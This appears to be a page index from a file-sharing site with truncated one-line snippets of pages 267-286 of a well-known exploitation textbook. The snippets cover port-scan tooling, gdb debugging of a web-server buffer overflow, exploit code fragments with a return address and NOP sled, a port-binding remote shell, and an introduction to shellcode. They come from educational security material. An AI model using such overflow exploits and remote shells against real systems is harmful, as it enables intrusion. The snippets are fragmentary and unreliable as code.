Hacking - The Art of Exploitation, 2nd Edition
Networking 267 0x475 Proactive Defense (shroud)............................................................ Port scans are often ...
268 0x400 PORT STATE SERVICE 22/tcp open|filtered ssh 80/tcp open|filtered http MAC Address: 00:01:6C:EB:1D:50 (Foxconn) Nmap fi ...
Networking 269 char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE char *device; u_long target_ip; int network, i; ...
270 0x400 strcat(filter_string, "tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack = 0"); if(ports[0] != 0) { // ...
Networking 271 NULL, // Payload (none) 0, // Payload length (passed->packet) + LIBNET_IP_H);// Packet header memory if (libne ...
272 0x400 23/tcp open telnet 24/tcp open priv-mail 25/tcp open smtp [ output trimmed ] 32780/tcp open sometimes-rpc23 32786/tcp ...
Networking 273 while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte. if(*ptr == EOL[eol_matched]) { // Does this byte mat ...
274 0x400 (gdb) bt 0 0xb7fe77f2 in ?? () 1 0xb7f691e1 in ?? () 2 0x08048ccf in main () at tinyweb.c:44 (gdb) list 44 39 if (list ...
Networking 275 $1 = 540 (gdb) p /x 0xbffff5c0 + 200 $2 = 0xbffff688 (gdb) quit The program is running. Quit anyway (and detach i ...
276 0x400 define RETADDR 0xbffff688 int main(int argc, char argv[]) { int sockfd, buflen; struct hostent host_info; struct socka ...
Networking 277 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9 ...
278 0x400 The vulnerability certainly exists, but the shellcode doesn’t do what we want in this case. Since we’re not at the con ...
Networking 279 When this exploit is compiled and run against a host running tinyweb server, the shellcode listens on port 31337 ...
280 0x400 Even though the remote shell doesn’t display a prompt, it still accepts commands and returns the output over the netwo ...
0x500 SHELLCODE So far, the shellcode used in our exploits has been just a string of copied and pasted bytes. We have seen stand ...
282 0x500 0x510 Assembly vs. C The shellcode bytes are actually architecture-specific machine instructions, so shellcode is writ ...
Shellcode 283 mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000 close(3) = ...
284 0x500 From /usr/include/unistd.h /* Standard file descriptors. */ #define STDIN_FILENO 0 /* Standard input. */ #define STDOU ...
Shellcode 285 define __NR_stime 25 define __NR_ptrace 26 define __NR_alarm 27 define __NR_oldfstat 28 define __NR_pause 29 defin ...
286 0x500 ; SYSCALL: write(1, msg, 14) mov eax, 4 ; Put 4 into eax, since write is syscall #4. mov ebx, 1 ; Put 1 into ebx, sinc ...
«
10
11
12
13
14
15
16
17
18
19
»
Free download pdf